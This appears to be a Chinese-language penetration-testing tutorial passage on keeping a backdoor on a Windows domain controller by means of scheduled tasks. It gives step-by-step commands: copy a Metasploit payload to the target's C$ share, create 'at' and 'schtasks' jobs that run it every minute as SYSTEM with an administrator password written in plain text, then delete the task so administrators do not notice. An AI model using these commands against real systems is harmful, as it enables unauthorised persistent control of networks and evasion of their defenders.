计划任务
为了使后门更加持久化,我们使用计划任务,定时上线木马。
我们可以通过at命令通过跳板机在目标主机DC上创建计划任务,让计算机在指定的时间执行木马程序,从而获得对内网目标主机的控制。
利用at命令具体实现:
使用net time命令确定目标主机DC的当前时间:
net time \\192.168.183.130(主机IP)
然后使用copy命令远程操作,将metasploit生成的payload文件复制到目标系统C盘中:
copy shell.exe \\192.168.183.130\c$
接着使用at命令创建计划任务,让目标主机DC在指定的时间运行metasploit木马程序:
at \\192.168.183.130 18:53:00 c:\shell.exe
最后,我们使用完计划任务后,还需要将该计划任务删除,以免被网管理员发现:
at \\192.168.183.130 1 /delete
// 1为计划任务的ID
利用 schtasks 命令具体实现:
at命令已经被Windows Vista、Windows Server 2008及之后版本的操作系统废弃了,代替他的是schtasks命命令。schtasks命令比at命令更为灵活、自由。
使用copy命令远程操作,将metasploit生成的payload文件shell.exe复制到目标系统C盘中。
在目标主机DC上创建一个名称为“backdoor”的计划任务。该计划任务每分钟启动一次,启动程序为我们之前到C盘下的shell.exe,启动权限为system。命令如下:
schtasks /create /s 192.168.183.130 /tn backdoor /sc minute /mo 1 /tr c:\shell.exe /ru system /f
在没有建立ipc连接时,要加上/u和/p参数分别设置用户名和密码。有些时候,由于当前权限或组策略设置等原因,该schtasks方法远程创建计划任务可能会报错拒绝访问。
遇到这种情况,我们可以加上/u和/p参数分别设置高权限用户名和密码,如下:
schtasks /create /s 192.168.183.130 /u administrator /p Liu78963 /tn backdoor /sc minute /mo 1 /tr c:\shell.exe /ru system /f
然后执行如下命令立即运行该计划任务
schtasks /run /s 192.168.183.130 /i /tn backdoor # i:忽略任何限制立即运行任务schtasks /run /s 192.168.183.130 /i /tn backdoor /u administrator /p Liu78963 # 遇到上面所说的报错时执行加上/u和/p参数分别设置高权限用户名和密码
计划任务成功运行后,执行如下命令强制删除该计划任务:
schtasks /delete /s 192.168.183.130 /tn "backdoor" /f
立即启动该计划任务:
schtasks /run /s 192.168.183.130 /i /tn test